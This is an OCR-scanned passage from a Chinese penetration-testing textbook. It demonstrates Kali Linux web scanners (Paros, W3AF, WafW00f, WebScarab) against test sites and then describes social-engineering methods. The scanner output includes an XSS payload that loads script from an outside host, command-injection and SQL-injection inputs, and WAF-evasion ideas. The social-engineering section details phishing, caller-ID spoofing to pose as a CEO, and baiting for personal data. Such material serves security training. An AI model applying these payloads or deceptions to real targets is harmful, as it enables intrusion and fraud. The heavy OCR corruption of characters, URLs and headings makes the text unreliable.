能 以 爬虫 方式 分 析 整 个 网 站 的 网 址 ， 并 执行 各 种 漏洞 测试 。 同 时 ， 审 计 
人 员 还 可 以 利用 它 的 代理 服务 器 功能 拦截 本 机 浏览 器 和 目标 应 用 程序 服 
务 器 之 间 的 Web 流 量 ( 支 持 HTTP/HTTPS 协 议 ) 。 审 计 人 员 可 以 利用 这 
种 机 制 修改 本 机 发 往 目标 服务 程序 的 特定 请 求 ， 从 而 进行 手工 测试 。 
此 ， Paros Proxy 不 仅 是 web 应 用 程序 安全 评估 的 主动 评估 工具 ， 而 且 
还 是 它 的 被 动 评 估 工 具 。 

如 需 启动 Paros Proxy 程 序 ， 可 在 果 面 菜单 里 依次 选中 Kali Linux | 
Web Applications |Web Application Proxies | Paros， 或 者 在 终端 中 使 用 下 
述 指令 。 

# paros 

上 述 指令 将 加 载 Paros Proxy 程 序 的 图 形 窗口 。 在 开始 测试 前 ， 你 需 
要 在 浏览 器 中 设置 本 地 代理 ， 即 设置 代理 的 IP 为 127.0.0.1， 端 口 为 
8080。 如 需 调 整 默认 设置 ， 可 在 且 单 Tools | Options 中 调整 连接 设置 、 本 
地 代理 的 设置 、HITP 认 证 和 其 他 相关 设置 。 在 设置 好 浏览 器 之 后 ， 就 
可 以 访问 目标 网 页 了 。 使 用 Paros Proxy 进 行 漏洞 测试 的 具体 步骤 如 下 。 

1. 在 本 例 中 ， 我 们 访问 http://testphp.targetdomain.com。 此 后 ，Paros 
Proxy 的 Sites 选 项 卡 里 显示 这 个 网 址 。 

2. 使 用 鼠标 右键 单 击 http:/Wtestphp.targetdomain.com 并 选择 Spider， 
以 朴 虫 方式 分 析 整 个 网 站 的 网 址 。 扫 摘 网 址 的 时 间 取 决 于 网 站 的 页 面 数 


E 


TÉ 
3. 在 程序 抓 取 完 网 址 之 后 ， 您 可 通过 底部 的 Spider 标签 查看 所 有 抓 
取 到 的 网 址 信息 。 此 外 ， 也 可 以 通过 在 Sites 选 项 卡 中 选择 特定 网 站 的 网 
页 ， 以 跟踪 其 请 求 和 响应 。 
4. 您 在 右 侧 面板 中 的 Trap 选项 卡 中 ， 调 查 特 定 的 请 求 和 啊 应 的 啊 
应 。 在 对 目标 应 用 程序 进行 手动 测试 时 ， 这 项 功能 尤其 有 用 。 此 外 ， 您 
aA Tools | Manual Request Editor， 手 工 构建 一 个 HITP 请 求 。 














5. 在 Sites 选项 卡 里 选中 目标 网 站 ， 然 后 在 羔 单 中 选择 Analyze | 
Scan Al， 可 对 选 定 网 站 进行 自动 化 的 漏洞 测试 。 另 外 ， 您 还 可 以 在 
Analyze | Scan Policy 指定 安全 测试 的 特定 类 型 ， 然 后 使 用 单独 的 
Analyze | Scan 功能 进行 特定 类 型 的 安全 测试 (而 不 是 Scan All 进行 的 那 
种 全 面 测 试 ) 。 

6. 在 程序 完成 漏洞 测试 之 后 ， 您 可 在 底部 的 Alerts 选项 卡 中 看 到 大 
量 的 安全 警告 。 依 照 其 危害 程度 ， 这 些 漏洞 被 分 为 High、Low 和 
Medium 三 种 级 别 。 

7. 如 需 查 看 上 次 扫描 结果 的 报告 ， 可 打开 有 末 单 Report | Last Scan 
Report。 它 将 会 把 本 此 测试 发 现 的 所 有 漏洞 保存 为 网 页 格式 文 
件 /root/paros/session/LatestScannedReport.htm。 

在 本 例 中 ， 我 们 仅 进行 了 基本 的 漏洞 评估 测试 。 如 需 获 取 Paros 
Proxy 选 项 的 详细 说 明 ， 请 访问 其 官方 的 用 户 手册 ， 地 址 为 http:/www.i- 
pi.com/Training/SecTesting/paros_user_guide.pdf. 

4. W3AF 

W3AF 是 一 天 功能 丰富 的 Web 应 用 程序 攻击 和 审计 框架 ， 它 主要 用 
于 探测 和 利用 web 漏洞。 它 实现 了 全 上 自动 化 的 应 用 程序 安全 评估 过 程 。 
整个 框架 的 设计 理念 遵循 了 下 述 三 个 主要 的 操作 步骤 识别 、 审 计 和 攻 
击 。 在 进行 每 个 操作 步骤 时 ， 审 计 员 都 可 使 用 其 提供 的 注重 特定 测试 标 
准 的 功能 插件 。W3AF 的 这 些 插件 实现 了 互相 之 间 的 通信 和 数据 共享 ， 
有 助 于 协同 完成 测试 任务 。 它 可 检查 、 利 用 的 Web 应 用 程序 漏洞 包括 
SQL 注入 、 路 站 脚本 、 远 程 和 本 地 文件 包含 、 绥 冲 区 溢出 、XPath 注 
和 入、 操作 系 统 命令 、 错 误 的 应 用 配置 等 。 有 关 各 个 插件 的 详细 信息 ， 请 
A vi http://w3af.sourceforge.net/plugin-descriptions.php - 

如 需 启 动 W3AF. TERMA KAAP Kali Linux | Web 
Applications | Web Vulnerability Scanners | w3af (Console)， 或 在 终端 中 使 
用 下 述 指令 。 


























# w3af console 

上 述 命 令 将 进入 到 W3AF 特 有 的 控制 台 模 式 (提示 符 为 
w3af>>>) 。 虽 然 在 果 面 沫 单 里 也 有 这 个 程序 的 GUI 版 本 ,但 是 考虑 到 
操作 灵活 性 ， 我 们 倾向 于 使 用 它 的 控制 台 版 本 。 

w3af>>> help 

上 述 指令 将 显示 配置 w3af 测 试 所 需 的 基本 选项 。 在 需要 得 看 帮助 
时 ， 可 随时 使 用 help 命 令 碍 看 特定 选项 的 说 明 信 息 。 本 例 首 先 配 置 
output 插件 ， 然 后 启用 特定 的 audit 测试 选项 ， 设 置 target 并 对 目标 网 站 
进行 扫描 。 相 关 指 令 如 下 。 

w3af>>> plugins 

w3af/plugins>>> help 

w3af/plugins>>> output 

w3af/plugins>>> output console, htmlFile 

w3af/plugins>>> output config htmlFile 

w3af/plugins/output/config:htmlFile>>> help 

w3af/plugins/output/config:htmlFile>>> view 

w3af/plugins/output/config:htmlFile>>> set verbose True 

w3af/plugins/output/config:htmlFile>>> set fileName testreport.html 

w3af/plugins/output/config:htmlFile>>> back 

w3af/plugins>>> output config console 

w3af/plugins/output/config:console>>> help 

w3af/plugins/output/config:console>>> view 

w3af/plugins/output/config:console>>> set verbose False 

w3af/plugins/output/config:console>>> back 

w3af/plugins>>> audit 

w3af/plugins>>> audit htaccessMethods, osCommanding, sqli, xss 


w3af/plugins»»» back 


w3af>>> target 
w3af/config:target>>> help 
w3af/config:target>>> view 
w3af/config:target>>> set target http://testphp.example.com/ 
waaf/config:target>>> back 
w3af>>> 
我 们 通过 上 述 指令 调整 好 了 各 项 参数 。 然 后 ， 我 们 将 通过 下 述 指 
令 ， 评 佑 目标 的 ”SQL 注入 、 跨 站 脚本 、 操 作 系 统 命 令 、htaccess 错 误 配 
置 等 漏洞 的 安全 问题 。 
w3af>>> start 
Auto-enabling plugin: grep.error500 
Auto-enabling plugin: grep.httpAuthDetect 
Found 2 URLs and 2 different points of injection. 
The list of URLs is: 
- http://testphp.example.com/ 
- http://testphp.example.com/search.php?test-query 
The list of fuzzable requests is: 
- http://testphp.example.com/ | Method: GET 
- http://testphp.example.com/search.php?test=query| Method: 
POST|Parameters:(searchFor="") 
Starting sqli plugin execution. 
Starting osCommanding plugin execution. 
A possible OS Commanding was found at: 
"http://testphp.example.com/search.php?test=query", using 
HTTP method POST. The sent post-data was: 
"searchFor=run+ping+-n+3+localhost & goButton=go".Please review 


manually. 


This information was found in the request with id 22. 
Starting xss plugin execution. 
Cross Site Scripting was found at: 
"http://testphp.example.com/search.php?test-query", 
using HTTP method POST. The sent post-data was: 
"searchFor=<ScRIPt/SrC=http://x4 Xp/x.js></ScRIPt> & 
goButton=go". 
This vulnerability affects Internet Explorer 6,Internet Explorer 
7,Netscape with IE rendering engine,Mozilla Firefox,Netscape with 
Gecko rendering engine. 
This vulnerability was found in the request with id 39. 
Starting htaccessMethods plugin execution. 
Finished scanning process. 
上 述 信息 表明 ，W3AF 发 现 该 Web 应 用 程序 存在 多 个 严重 的 安全 漏 
洞 。 我 们 已 经 在 配置 中 指定 好 了 测试 报告 的 文件 名 ， 该 文件 位 
于 /pentest/web/w3af/testreport，html。 扫 朱 报 告 会 列 出 所 有 漏洞 的 全 部 细 
节 ， 其 中 包括 W3AF 程序 和 目标 Web 应 用 程序 之 间 每 个 请 求 信息 、 相 
应 啊 应 、 所 传递 的 数据 以 及 调试 信息 等 。 本 例 没有 使 用 别 的 的 插件 
(plugins) 、 配 置 文件 〈profiles) 和 漏洞 利用 Cexploit) 选项 。 因 此 ， 
本 书 强 烈 建议 读者 参考 官方 的 用 户 指 南 ， 进 行 各 种 练习 。 官 方 手册 的 下 
载 网 址 是 http://w3af. 
sourceforge.net/documentation/user/w3afUsersGuide.pdf. 
5. WafWoof 
WafW00f 是 检测 Web 应 用 程序 防火 墙 (WAEF) 的 Python 脚本 程序 。 
在 评估 WAF 保 护 的 目标 主机 时 ， 许 多 漏洞 评估 技术 都 难以 萎 效 ， 而 这 
正 是 wafW00f 程 序 擅长 的 测试 环境 。 部 署 于 应 用 服务 器 和 Internet 流 量 之 
间 的 WAF 防 火 墙 ， 不 仅 提 高 了 测试 策略 的 难度 ， 同 时 还 使 渗透 测试 人 








员 开 及 的 高 级 规避 技术 面临 了 新 的 挑战 。 
如 需 局 动 WafW00f 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# wafwOOf 
上 述 指令 将 在 显示 器 上 显示 简单 的 使 用 说 明 ， 以 及 几 个 典型 的 指令 
范例 。 本 例 中 ， 我 们 将 通过 下 述 指令 ,分 析 目 标 网 站 是 否 使 用 WAF 系 
统 。 
# wafw00f http://www.example.net/ 
WAFWOOF - Web Application Firewall Detection Tool 
By Sandro Gauci & & Wendel G. Henrique 
Checking http://www.example.net/ 








The site http://www.example.net/ is behind a dotDefender 

Number of requests: 5 
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ul, dotDefender) 。 通 过 这 些 信息 ， 我 们 可 以 进一步 地 调查 规避 WAF 
规则 的 方法 。 这 可 能 涉及 一 些 如 HTTP 参 数 污染 、 空 字 节 替换 、 规 范 化 
处 理 、 使 用 十 六 进 制 字符 或 Unicode 字 符 对 恶意 URL 进 行 编码 等 技术 。 

6. WebScarab 

WebScarab 是 一 款 功 能 强大 的 Web 应 用 程序 的 安全 评估 工具 。 它 
有 多 种 操作 模式 ， 主 要 模式 为 拦截 代理 。 将 WebScarab 代 理 部 署 于 终端 
用 户 浏览 右 和 目标 Web 应 用 程序 之 间 ， 可 监控 、 修 改 二 者 之 间 的 请 求 和 
回应 。 审 计 人 员 可 以 手动 构造 连接 请 求 ， 然 后 检查 目标 Web 应 用 程序 返 
回 的 响应 信息 。WebScarab ”集成 了 诸多 工具 ， 这 些 工具 包括 fuzzer. 
session ID analysis. spider. web services analyzer. XSS 和 CRLF 漏洞 扫 
描 器 和 transcoder 等 程序 。 

如 需 启 动 WebScarab Lite 程 序 ， 可 在 柬 面 染 单 里 依次 选中 Kali Linux 
| WebApplications |Web Vulnerability Scanners | webscarab， 或 在 终端 中 使 
用 下 述 指令 。 











# webscarab 

上 述 指令 将 执行 精简 版 的 WebScarab 。 根 据 本 例 的 需要 ， 我 们 通过 

荣 单 Tools | Use full-featured interface 令 程 序 显示 全 部 的 功能 选项 。 程 序 
将 询问 您 是 否 局 用 这 项 功能 ， 然 后 会 重启 该 应 用 程序 。 再 次 启动 之 后 ， 
WebScarab 的 界面 上 将 新 增 很 多 工具 的 选项 卡 。 在 开始 评估 工作 之 前 ， 
我 们 应 调整 浏 和 使 其 使 用 本 地 代理 服务 器 〈127.0.0.1， 
80800 ， 以 使 得 浏览 器 通过 WebScarab ”的 拦截 代理 访问 目标 主机 。 男 
外 ， 您 可 以 在 Proxy | Listeners 选 项 卡 中 调整 本 地 代理 服务 器 的 有 头 设置 
GP 地 址 或 端口 ) 。 使 用 WebScarab 程 序 分 析 目 标 应 用 程序 的 session ID 
的 步骤 如 下 。 

1. 设置 好 浏览 器 的 代理 服务 器 选项 之 后 ， 您 可 使 用 浏览 器 访问 目标 
网 站 《例如 http:Wtestphp.targetdomain.com/) ， 并 访问 尽 可 能 多 的 链接 。 
rdi d 发 现 已 知 和 未 知 漏洞 的 机 会 也 就 越 大 。 除 了 这 种 方 
法 ， 您 还 可 在 Summary 选 项 卡 中 使 用 鼠标 右键 点 击 目标 网 站 ， 然 后 选择 
eae 此 后 ， 程 序 将 自动 查找 目标 应 用 程序 的 所 有 可 用 链接 。 

2. 如 果 想 检查 特定 页 面 的 请 求 和 啊 应 数据 ， oe er 
标签 。 程 序 将 表格 的 形式 显示 原始 的 和 解析 过 的 浏览 器 请 求 。 此 外 ， 
还 可 以 看 到 以 HTML、XML、TEXT 和 Hex 格 式 显示 的 响应 信息 。 

3. 在 测试 过 程 中 ， 我 们 决定 对 目标 应 用 程序 链接 中 的 茶 个 参数 〈 例 
如 ，artist=1) 以 GET 请 求 进行 模糊 测试 。 这 种 测试 有 助 于 找到 未 被 发 
现 的 漏洞 。 我 们 使 用 鼠标 右键 点 击 选 定 的 链接 ， 并 选择 Use as fuzz 
template。 然 后 转 到 Fuzzer 选项 卡 ， 点 击 Parameters 附近 的 Add 按钮 ， 
人 工 添 加 需要 进行 模糊 测试 的 参数 。 在 本 例 中 ， 我 们 写 了 一 个 小 型 文本 
文件 ， 这 个 文件 含有 已 知 的 SQL ”注入 数据 (例如 , 1 AND1=2、 
1AND1=1、 蛙 引号 [?]) ， 然 后 指定 这 个 文本 文件 作为 模糊 测试 的 参数 
值 。 这 种 指定 操作 可 通过 Fuzzer 选 项 卡 下 的 Sources 按 钮 完成 。 准 备 好 模 
糊 测 试 数据 后 ， 我 们 点 击 Start 开始 测试 。 所 有 测试 完成 后 ， 可 以 双击 














单个 请 求 以 检查 其 相应 的 啊 应 。 我 们 在 本 例 中 发 现 了 MySQL 注 入 漏 
洞 。 

Error: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '\" 
at line 1 Warning: mysql_fetch_array():supplied argument is not a valid 
MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php 
on line 74 

4. 最 后 ， 我 们 分 析 目 标 应 用 程序 的 session ID 。 我 们 选中 Session ID 
Analysis 选 项 卡 ， 并 在 组 合 框 中 选中 Previous Requests。 等 程序 加 载 了 特 
定 请 求 之 后 ， 我 们 在 压 部 设 定 采 样 次 数 〈 例 如 ，20) 。 然 后 反击 Fetch 
按钮 开始 对 session ID 进行 采样 。 之 后 ， 点 击 Test 按 钮 对 样本 进行 分 析 。 
而 后 ， 可 在 Analysis 选 项 卡 下 看 到 分 析 结 末 。 此 外 ， 我 们 可 在 
Visualization 选项 卡 中 看 到 相应 的 可 视 化 分 析 。 这 种 分 析 用 于 判断 
session ID 的 杂 化 程度 和 不 可 预期 性 。 上 述 指标 如 有 果 不 理想 ， 就 可 能 引 
发 通过 某 session ID 劫持 他 人 session 或 获取 他 人 认证 信息 的 事故 。 

WebScarab 另 有 大 量 的 选项 和 其 他 的 功能 ， 它 们 有 助 于 我 们 提高 对 
渗透 测试 的 认识 。 有 关 WebScarab 项 目的 更 多 信息 ， 请 访问 
http://www.owasp.org/index.php/Category:DWASP WebScarab Project. 
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本 章 通 过 Kali Linux 中 的 多 款 工 具 ， 阐 述 了 识别 和 分 析 关 键 安全 漏 
洞 的 具体 方法 。 有 关 篇 幅 介 绍 了 安全 漏洞 的 三 大 类 型 : 设计 类 漏洞 、 实 
施 类 漏洞 和 运营 类 漏洞 ， 以 及 安全 漏洞 的 两 大 种 类 : 本 地 漏洞 和 远程 漏 
洞 。 然 后 ， 本 文 简 要 介绍 了 几 种 安全 漏洞 的 分 类 标准 。 这 些 标准 依据 缺 
陷 的 普遍 共性 对 漏洞 进行 了 总 结 ， 是 安全 审计 人 员 所 遵循 的 分 类 标准 。 
为 了 指导 漏洞 评估 的 具体 工作 ， 本 文 列 举 了 几 和 天 结合 自动 检验 技术 和 手 

















动 检 验 技术 的 评估 工具 ， 并 依据 其 特定 的 审计 技术 对 这 些 工 具 进 行 了 分 
类 。 本 章 介 绍 的 工具 有 OpenVAS (集合 了 所 有 功能 的 评估 工具 ) 、 
Cisco 分 析 工 具 、 模 糊 分 析 工 具 、SMB 分 析 工 具 、SNMP 工 具 和 Web 应 用 
程序 安全 评估 工具 。 

下 一 童 将 讨论 欺骗 的 艺术 ， 即 利用 人 性 的 弱点 获取 目标 信息 的 各 种 
方法 。 虽 然 并 非 每 次 评估 工作 都 涉及 这 些 工 作 ， 但 在 缺乏 目标 信息 时 有 
关 技 术 就 显得 十 分 必要 。 








第 8 章 社会 工程 学 攻击 


社会 工程 学 是 利用 人 性 弱点 体察 、 获 取 有 价值 信息 的 实践 方法 ， 它 
是 一 种 欺骗 的 艺术 。 在 缺少 目标 系统 的 必要 信息 时 ， 社 会 工程 学 技术 是 
渗透 测试 人 员 获 取信 息 的 至 关 重 要 的 手段 。 对 所 有 类 型 的 组 织 〈( 单 位 ) 
而 言 ， 人 都 是 安全 防范 措施 里 最 薄弱 的 一 环 ， 也 是 整个 安全 基础 设施 最 
脆弱 的 层面 。 人 都 是 社会 的 产物 ， 人 的 本 性 就 是 社会 性 ， 所 以 人 都 有 社 
会 学 方面 的 弱点 都 易 受 社会 工程 学 攻击 。 社 会 工程 学 的 攻击 人 员 通 闻 利 
用 社会 工程 学 手段 获取 机 密 信 息 ， 甚 至 可 以 造访 受 限 区 域 。 社 会 工程 学 
的 方式 多 种 多 样 ， 而 且 每 种 方法 的 效果 和 导 问 完全 取决 于 使 用 人 员 的 想 
象 能 力 。 本 章 将 阐述 社会 工程 学 核心 原则 ， 并 会 介绍 专业 的 社会 工程 攻 
击 人 员 用 其 操纵 他 人 或 挖掘 信息 的 实例 。 








本 章 分 为 以 下 几 个 部 分 : 
e 透 过 心理 学 的 基本 原理 ， 带 领 读者 大 致 了 解 社 会 工程 学 的 手段 和 
目标 。 


e 通过 几 个 真实 的 例子 ， 演 示 社 会 工程 学 的 攻击 过 程 及 使 用 方法 。 

从 安全 角度 来 看 ， 社 会 工程 学 是 以 获取 特定 信息 为 目标 的 操纵 他 人 
的 有 力 武 器 。 很 多 单位 都 使 用 社会 工程 学 的 方法 进行 安全 评估 ， 以 考核 
雇员 的 安全 完整 性 ， 并 通过 这 种 方法 调查 工作 流程 和 人 员 方面 的 安全 弱 
扩 。 需 要 注意 的 是 ， 社 会 工程 学 是 种 很 常见 的 搁 术 ， 可 以 说 各 种 人 员 痢 
会 使 用 这 种 技术 。 无 论 是 渗透 测试 人 员 ， 还 是 诈 驴 专家、 身份 鳃 贼 、 商 
业 合 作 伙伴 、 求 职 人 员 、 销 售 人 员 、 信 息 经 纪 人 、 电 话 推销 员 、 政 府 间 
恋 、 心 怀 不 满 的 员工 ， 甚 至 日 党 生活 中 的 孩童 都 会 使 用 这 种 技术 ， 只 是 
他 们 的 动机 不 同 而 已 。 




















8.1 人 类 心理 学 建 模 


人 类 的 心理 取决 于 感官 的 输入 。 感 官 的 作用 是 形成 对 现实 的 感知 。 
按照 感官 对 上 自然 现象 的 识别 作用 来 划分 ， 人 的 感官 可 分 成 视觉 、 听 觉 、 
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官 。 人 类 正 是 利用 、 发 展 他 们 的 这 些 感官 的 功能 ， 得 以 感知 外 部 世界 。 
站 在 社会 工程 学 的 立场 ， 任 何 通过 显 性 感 党 《视觉 或 听 党 ) 、 有 眼睛 的 动 
作 ( 眼 神 接触 、 口 涉 上 的 差异 、 上 刀 眼 频率 或 眼睛 暗示 )〉 . eB CD 
E. See. AIR. TE. TUR) 和 其 他 抽象 实体 进行 观察 或 感觉 
收集 到 的 信息 ， 都 可 增加 成 功 获取 目标 信息 的 概率 。 大 多 数 情况 下 ， 社 
会 工程 学 工程 师 必须 直接 与 目标 进行 沟通 ， 才 能 获取 机 和 密 信 息 或 受 限 区 
域 的 访问 权 。 沟 通 形式 可 以 是 直接 见面 的 接触 方式 ， 也 可 以 是 通过 电子 
辅助 技术 进行 的 不 见面 接触 方式 。 在 实际 工作 中 ， 第 见 的 沟通 方式 分 为 
两 类 : 面谈 或 问 询 。 但 是 ， 这 两 种 方法 都 受到 其 他 因素 的 制约 ， 例 如 环 
境 因 素 、 对 目标 的 熟悉 程度 和 控制 沟通 模式 的 能 力 。 所 有 这 些 因 素 〈 沟 
通 、 环 境 、 知 识 和 沟通 模式 控制 ) 构 成 社会 工程 学 工程 师 必 备 的 基本 技 
。 整 个 社会 工程 学 活动 取决 于 攻击 者 与 目标 之 间 的 信任 关系 。 如 果 不 
与 目标 建立 足够 的 信任 关系 ， 则 所 有 的 努力 都 可 能 付 之 东 流 。 

现在 ， 社 会 工程 学 已 经 形成 了 一 门 独 立 学 科 。 有 关 社 会 工程 学 框架 
(Social Engineering Framework) 的 详细 信息 ， 请 访问 作者 的 官方 网 
站 : http://www.social-engineer.org/. Christopher Hadnagy 运营 着 这 个 网 
站 ， 并 且 发 布 了 社会 工程 学 领域 的 各 种 研究 成 果 。 他 将 这 些 信息 癌 公众 
开放 ， 以 便于 他 人 继续 研究 社会 工程 学 攻击 的 具体 方法 。 如 果 需 要 对 用 
户 进 行 安 全 培训 ， 可 参考 有 关 资 料 。 
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8.2 攻击 过 程 








本 节 将 介绍 一 些 发 动 社会 工程 学 攻击 的 基本 步骤 。 虽 然 这 不 是 社会 
工程 学 攻击 的 唯一 方法 ， 甚 至 可 以 说 没有 成 功率 高 的 正式 方法 ， 但 是 本 
文 的 这 些 步 又 可 帮助 您 形成 社会 工程 学 的 基本 认识 。 情 报 收集 、 识 别 漏 
洞 、 规 划 攻 击 和 执行 攻击 一 一 社会 工程 学 工程 师 通 常 都 会 采用 这 些 某 本 
步 又， 它们 可 有 效 获取 目标 的 有 关 信 息 或 访问 权限 。 

1. 情报 收集 : 多 种 技术 都 可 用 于 找到 最 容易 攻破 的 渗透 测试 目标 。 
例如 ， 我 们 可 采用 高 级 搜索 工具 收集 和 被 测 公司 员工 的 E-mail 地 址 ; 通过 
社交 网 络 收集 被 测 单位 员工 的 个 人 信息 ;识别 被 测 单位 组 织 使 用 的 第 三 
方 软件 包 ; 参与 他 们 的 经 营 活动 、 社 交 活 动 和 参加 其 会 议 等 。 以 这 些 方 
式 提供 的 情报 ， 能 够 准确 地 推测 出 社会 工程 学 意义 上 的 “ 线 人 ”。 

2. 识别 漏洞 : 一 旦 选 定 了 关键 线 人 ， 接 下 来 就 开始 与 对 方 建立 信任 
关系 和 友谊 。 这 样 就 可 以 在 不 伤害 、 不 惊动 目标 的 情况 下 ， 和 截获 被 测 单 
位 的 机 密 信 息 。 保 持 行动 的 隐蔽 性 和 保密 性 ， 对 于 整个 过 程 来 说 至 关 重 
要 。 忆 外 ， 也 可 以 调查 被 测 单位 是 否 使 用 了 旧版 本 软件 ， 继 而 通过 恶意 
的 E-mail 或 Web 内 容 ， 利 用 软件 漏洞 感染 当事人 的 计算 机 。 

3. 规划 攻击 : 您 可 以 对 目标 采取 直截了当 的 攻击 方式 ， 也 可 以 利用 
电子 辅助 搁 术 被 动 地 攻击 目标 。 以 这 些 挖掘 出 来 的 情报 入 口 着 手 ， 我 们 
可 以 轻松 地 拟定 攻击 路 径 和 攻击 方法 。 例 如 ， 被 测 单位 的 客户 服务 代表 
Bob 和 我 们 的 关系 很 好 ， 他 还 信任 我 们 ， 他 就 可 能 在 计算 机 上 执行 我 们 
发 送 的 E-mail 附件 ， 而 这 种 攻击 不 需要 局 级 管理 人 员 的 任何 事前 授权 。 

4. 执行 攻击 : 社会 工程 学 攻击 的 最 后 一 步 是 执行 攻击 计划 。 此 时 ， 
我 们 应 该 保持 足够 的 信心 和 耐心 ， 主 动 监控 和 评估 工作 成 果 。 完 成 这 一 
步 之 后 ， 社 会 工程 学 工程 师 掌握 了 充分 信息 ， 其 至 可 以 访问 被 测 单 位 的 
内 部 系统 ， 这 些 成 果 足 以 让 他 们 进一步 地 渗透 被 测 单位 。 在 成 功 执行 攻 
击 计 划 之 后 ， 社 会 工程 学 的 攻击 就 可 宣告 结束 。 





























8.3 攻击 方 ; 


社会 工程 学 中 ， 有 5 种 有 助 于 理解 、 识 别 、 结 交 、 准 备 目标 的 攻击 
方法 。 社 会 工程 学 按照 它们 的 特点 ， 将 它们 进行 了 归 类 。 本 市 介绍 了 一 
些 真实 的 案例 ， 以 帮助 读者 在 实际 情况 中 灵活 运用 各 种 所 需 方法 。 请 注 
意 这 些 攻击 方法 针对 的 是 个 人 的 心理 学 因素 ， 要 想 提 高 这 些 方法 的 效 
用 ， 就 应 该 进行 定期 的 训练 和 练习 。 


8.3.1 H A Tug 


攻击 人 员 常 常 假装 成 他 人 以 获取 对 方 的 信任 。 例 如 ， 在 获取 目标 人 
员 的 银行 信息 方面 ， 只 要 目标 人 员 使 用 E-mail， 我 们 就 可 以 进行 钓鱼 攻 
击 。 这 种 攻击 属于 近乎 完美 的 攻击 方案 。 当 决定 使 用 钓鱼 攻击 之 后 ， 攻 
击 人 员 要 大 量 地 收集 目标 人 员 用 过 的 E-mail 地 址 ， 然 后 伪造 出 与 原 银 
行 界面 一 样 的 网 页 界面 ， 以 诱骗 目标 人 员 。 

完成 了 以 上 准备 之 后 ， 攻 击 人 员 会 草拟 并 发 送 一 份 正式 行文 的 E- 
mail《 例 如， 银行 账户 更 新 通知 )。 这 些 E-mail 看 上 去 就 像 真正 银行 发 
出 来 的 邮件 ， 要 求 目 标 人 员 访 问 某 网 址 更 新 账户 信息 。 不 过 ， 邮 件 提 到 
的 网 址 将 把 目标 人 员 提 交 的 信息 转发 给 攻击 人 员 。 攻 击 人 员 事 先 掌握 了 
特定 的 Web 技术 ， 他 们 使 用 多 种 先进 的 工具 “例如 SSLstrip〉 束 可 以 通 
过 自动 化 手段 轻松 有 效 地 达成 预定 任务 。 与 那些 借助 他 人 帮助 的 欺骗 方 
法 相 比 ， 这 种 方法 通过 模拟 银行 业务 的 手段 可 直接 达成 冒名 项 蔡 的 有 目 
的 。 




















8.3.2 投 桃 报 李 


通过 利益 交换 的 方式 达成 双方 各 目 利 益 的 行为 ， 被 称 为 投 桃 报 李 。 
这 类 攻击 需要 长 期 业务 合作 达成 的 非 正式 〈 私 人 ) 关系 。 利 用 公司 之 间 
的 信任 关系 ， 可 以 轻松 地 找到 可 获取 特定 信息 的 目标 人 员 。 例 如 Bob 是 
一 个 专业 黑客 ， 他 想 知道 ABC 公司 办 公 大 楼 的 物理 安全 策略 。 进 行 仔细 
考察 之 后 ， 他 诀 定 制作 一 个 廉价 销售 古玩 的 网 站 ， 以 吸引 两 名 雇员 的 关 








ik. Bob 可 事先 通过 社交 网 站 擎 握 这 两 人 的 个 人 信息 ， 了 解 他 们 的 E- 
mail 地 址 、 网 络 论坛 等 资料 。 在 这 两 人 之 中 ，Alice 在 Bob 的 网 站 上 定期 
采购 了 商品， 成 为 了 Bob 的 主要 目标 。Bob 决 定 要 以 一 件 稀有 古董 换取 她 
们 公司 的 内 部 文件 。 利 用 人 类 心理 学 因素 ， 他 将 向 Alice 发 送 了 E-mail， 
以 转让 这 件 黎 有 古董 为 筹码 ， 要 求 Alice 提 供 ABC 公 司 的 物理 安全 策 

略 。 在 混淆 了 工作 员 任 和 个 人 利益 的 状态 下 ，Alice 把 公司 信息 透露 给 了 
Bob。 在 创建 驴 局 的 同时 ， 通 过 价值 交换 的 事情 强化 私人 关系 ， 可 成 为 
社会 工程 学 攻击 的 有 效 手段 。 





8.3.3 狐 假 虎威 


慎 充 目标 单位 业务 负责 人 的 映 份 从 而 干预 正常 业务 的 做 法 就 是 狐 假 
虎威 。 有 些 人 认为 ， 这 种 攻击 方法 属于 冒名 项 蔡 的 一 种 特例 。 人 们 会 出 
于 本 能 下 意识 地 接受 权威 和 高 级 管理 人 员 的 指示 ， 这 个 时 候 他 们 会 无 视 
自己 否定 性 的 直觉 。 这 种 天 性 使 我 们 容易 在 特定 的 威胁 面前 至 无 抵抗 
力 。 例 如 ， 某 人 要 通过 XYZ 公 司 的 网 络 管理 员 获 取 网 络 认 证 的 技术 细 
节 。 经 过 一 段 时 间 的 专注 分 析 ， 他 可 以 通过 利益 交换 方法 获得 网 络 管理 
员 和 CEO 的 电话 号 码 。 后 来 ， 他 使 用 来 电 号 人 码 的 伪造 服务 (例如 ， 
www.spoofcard.com) 给 网 络 管理 员 打 电话 。 此 时 ， 网 管 会 认为 该 电话 
来 和 目 CEO， 将 遵从 攻击 人 员 的 指示 。 这 种 假冒 权威 人 员 身 份 的 狐 假 虎威 
的 做 法 ， 利 用 了 目标 人 员 必 须 遵从 公司 高 级 管理 人 员 指 示 的 规律 ， 诱 导 
目标 人 员 泄 露 信息 。 




















8.4 Is VL XR RII 


人 们 第 说 “机 不 可 失 ”， 他 们 特别 关注 所 谓 机 不 可 失 的 宝 贯 机 会 。 这 
些 想法 都 是 人 性 贫 禁 一 面 的 写照 。 唉 以 重 利 的 方法 利用 了 人 们 泡 求 谋 利 
机 会 的 贫 禁 心理 。 闭 名 的 Nigerian 419 Scam (www.419eater.com) 是 利 


用 人 类 贫 欲 的 典型 例 于 。 证 我 们 举 一 个 例子 ，Bob 想 要 收集 XYZ 大 学 里 
学 生 的 个 人 信息 。 在 他 获取 所 有 学 生 的 E-mail 地 址 的 情况 下 ， 他 可 以 向 
学 生 们 发 送 邮件 并 宣告 : 提供 个 人 信息 《〈 姓 名、 地址 、 电 话 、 电 子 邮 
件 、 出 生日 期 、 护 照 号 码 等 ) 将 免费 获 赠 iPod。 由 于 这 个 创意 专门 针对 
在 校 学 生 设 计 ， 而 且 足 以 使 他 们 确信 能 够 免费 获得 最 新 的 记 od， 所 以 多 
数 的 在 校 学 生 会 落 入 这 个 骗局 。 在 企业 界 ， 相 应 的 攻击 方法 通常 豆 吹 可 
以 获得 最 大 商业 收益 ， 达 成 业务 目标 。 


8.5 社会 关系 


作为 人 ， 我 们 需要 某 种 形式 的 社会 天 系 ， 以 分 享 思想 、 感 情 和 想 
